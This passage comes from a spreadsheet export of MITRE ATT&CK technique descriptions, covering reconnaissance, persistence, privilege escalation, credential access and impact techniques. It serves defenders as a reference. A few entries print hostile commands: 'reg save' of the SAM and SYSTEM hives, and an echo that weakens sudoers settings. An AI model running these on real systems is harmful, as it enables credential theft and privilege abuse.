Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
https://attack.mitre.org/techniques/T1590/002</t>
  </si>
  <si>
    <t>T1485.001</t>
  </si>
  <si>
    <t>Lifecycle-Triggered Deletion</t>
  </si>
  <si>
    <t>Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.  
Cloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation: GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once. 
For example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657), adversaries may also perform this action on buckets storing cloud logs for [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation: Datadog S3 Lifecycle CloudTrail Logs)
https://attack.mitre.org/techniques/T1485/001</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>Audio Capture</t>
  </si>
  <si>
    <t>An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.
https://attack.mitre.org/techniques/T1123</t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t>Create or Modify System Process</t>
  </si>
  <si>
    <t>Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) 
Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.  
Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection)
https://attack.mitre.org/techniques/T1543</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)
https://attack.mitre.org/techniques/T1133</t>
  </si>
  <si>
    <t>T1546.006</t>
  </si>
  <si>
    <t>LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
https://attack.mitre.org/techniques/T1546/006</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>Steal Web Session Cookie</t>
  </si>
  <si>
    <t>An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)
There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)
After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.
https://attack.mitre.org/techniques/T1539</t>
  </si>
  <si>
    <t>T1053.007</t>
  </si>
  <si>
    <t>Container Orchestration Job</t>
  </si>
  <si>
    <t>Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)
https://attack.mitre.org/techniques/T1053/007</t>
  </si>
  <si>
    <t>T1568.002</t>
  </si>
  <si>
    <t>Domain Generation Algorithms</t>
  </si>
  <si>
    <t>Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
https://attack.mitre.org/techniques/T1568/002</t>
  </si>
  <si>
    <t>T1036.007</t>
  </si>
  <si>
    <t>Double File Extension</t>
  </si>
  <si>
    <t>Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: &lt;code&gt;File.txt.exe&lt;/code&gt; may render in some views as just &lt;code&gt;File.txt&lt;/code&gt;). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) 
Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named &lt;code&gt;Evil.txt.exe&lt;/code&gt; may display as &lt;code&gt;Evil.txt&lt;/code&gt; to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)
Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.
https://attack.mitre.org/techniques/T1036/007</t>
  </si>
  <si>
    <t>T1548.002</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* &lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
https://attack.mitre.org/techniques/T1548/002</t>
  </si>
  <si>
    <t>T1496.003</t>
  </si>
  <si>
    <t>SMS Pumping</t>
  </si>
  <si>
    <t>Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
https://attack.mitre.org/techniques/T1496/003</t>
  </si>
  <si>
    <t>T1016.001</t>
  </si>
  <si>
    <t>Internet Connection Discovery</t>
  </si>
  <si>
    <t>Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), &lt;code&gt;tracert&lt;/code&gt;, and GET requests to websites.
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.
https://attack.mitre.org/techniques/T1016/001</t>
  </si>
  <si>
    <t>T1548.003</t>
  </si>
  <si>
    <t>Sudo and Sudo Caching</t>
  </si>
  <si>
    <t>Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The &lt;code&gt;sudo&lt;/code&gt; command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a &lt;code&gt;timestamp_timeout&lt;/code&gt;, which is the amount of time in minutes between instances of &lt;code&gt;sudo&lt;/code&gt; before it will re-prompt for a password. This is because &lt;code&gt;sudo&lt;/code&gt; has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at &lt;code&gt;/var/db/sudo&lt;/code&gt; with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a &lt;code&gt;tty_tickets&lt;/code&gt; variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like &lt;code&gt;user1 ALL=(ALL) NOPASSWD: ALL&lt;/code&gt;.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, &lt;code&gt;/var/db/sudo&lt;/code&gt;'s timestamp can be monitored to see if it falls within the &lt;code&gt;timestamp_timeout&lt;/code&gt; range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if &lt;code&gt;tty_tickets&lt;/code&gt; is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled &lt;code&gt;tty_tickets&lt;/code&gt; to potentially make scripting easier by issuing &lt;code&gt;echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers&lt;/code&gt;.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default.
https://attack.mitre.org/techniques/T1548/003</t>
  </si>
  <si>
    <t>T1560.003</t>
  </si>
  <si>
    <t>Archive via Custom Method</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)
https://attack.mitre.org/techniques/T1560/003</t>
  </si>
  <si>
    <t>T1578</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure</t>
  </si>
  <si>
    <t>An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)
https://attack.mitre.org/techniques/T1578</t>
  </si>
  <si>
    <t>T1584.008</t>
  </si>
  <si>
    <t>Network Devices</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
Once an adversary has control, compromised network devices can be used to launch additional operations, such as hosting payloads for [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (i.e., [Link Target](https://attack.mitre.org/techniques/T1608/005)) or enabling the required access to execute [Content Injection](https://attack.mitre.org/techniques/T1659) operations. Adversaries may also be able to harvest reusable credentials (i.e., [Valid Accounts](https://attack.mitre.org/techniques/T1078)) from compromised network devices.
Adversaries often target Internet-facing edge devices and related network appliances that specifically do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
Compromised network devices may be used to support subsequent [Command and Control](https://attack.mitre.org/tactics/TA0011) activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Botnet](https://attack.mitre.org/techniques/T1584/005) network.(Citation: Justice GRU 2024)
https://attack.mitre.org/techniques/T1584/008</t>
  </si>
  <si>
    <t>T1583.008</t>
  </si>
  <si>
    <t>Malvertising</t>
  </si>
  <si>
    <t>Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations  online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. 
Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.(Citation: Masquerads-Guardio)(Citation: FBI-search) Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.(Citation: sentinelone-malvertising) 
Malvertising may be used to support [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.(Citation: BBC-malvertising)
Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.(Citation: Masquerads-Guardio) Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.(Citation: spamhaus-malvertising)
https://attack.mitre.org/techniques/T1583/008</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)
https://attack.mitre.org/techniques/T1069</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Emails may also contain details of ongoing incident response operations, which may allow adversaries to adjust their techniques in order to maintain persistence or evade defenses.(Citation: TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries can collect or forward email from mail servers or clients.
https://attack.mitre.org/techniques/T1114</t>
  </si>
  <si>
    <t>T1003.002</t>
  </si>
  <si>
    <t>Security Account Manager</t>
  </si>
  <si>
    <t>Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the &lt;code&gt;net user&lt;/code&gt; command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes: 
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
https://attack.mitre.org/techniques/T1003/002</t>
  </si>
  <si>
    <t>T1596.002</t>
  </si>
  <si>
    <t>WHOIS</t>
  </si>
  <si>
    <t>Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596/002</t>
  </si>
  <si>
    <t>T1542.001</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t>Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI)
System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.
https://attack.mitre.org/techniques/T1542/001</t>
  </si>
  <si>
    <t>T1594</t>
  </si>
  <si>
    <t>Search Victim-Owned Websites</t>
  </si>
  <si>
    <t>Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
In addition to manually browsing the website, adversaries may attempt to identify hidden directories or files that could contain additional sensitive information or vulnerable functionality. They may do this through automated activities such as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as well as by leveraging files such as sitemap.xml and robots.txt.(Citation: Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015)
https://attack.mitre.org/techniques/T1594</t>
  </si>
  <si>
    <t>T1069.003</t>
  </si>
  <si>
    <t>Cloud Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The &lt;code&gt;Get-MsolRole&lt;/code&gt; PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command &lt;code&gt;az ad user get-member-groups&lt;/code&gt; will list groups associated to a user account for Azure while the API endpoint &lt;code&gt;GET https://cloudidentity.googleapis.com/v1/groups&lt;/code&gt; lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS &lt;code&gt;GetBucketAcl&lt;/code&gt; API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.
https://attack.mitre.org/techniques/T1069/003</t>
  </si>
  <si>
    <t>T1574.011</t>
  </si>
  <si>
    <t>Services Registry Permissions Weakness</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the &lt;code&gt;FailureCommand&lt;/code&gt; key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)
The &lt;code&gt;Performance&lt;/code&gt; key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the &lt;code&gt;Performance&lt;/code&gt; key is not already present and if an adversary-controlled user has the &lt;code&gt;Create Subkey&lt;/code&gt; permission, adversaries may create the &lt;code&gt;Performance&lt;/code&gt; key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)
Adversaries may also add the &lt;code&gt;Parameters&lt;/code&gt; key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll&lt;/code&gt;.(Citation: malware_hides_service)
https://attack.mitre.org/techniques/T1574/011</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
    <t>DNS/Passive DNS</t>
  </si>
  <si>
    <t>Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596/001</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>Application Exhaustion Flood</t>
  </si>
  <si>
    <t>Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)
https://attack.mitre.org/techniques/T1499/003</t>
  </si>
  <si>
    <t>T1195.001</t>
  </si>
  <si>
    <t>Compromise Software Dependencies and Development Tools</t>
  </si>
  <si>
    <t>Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)  
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.
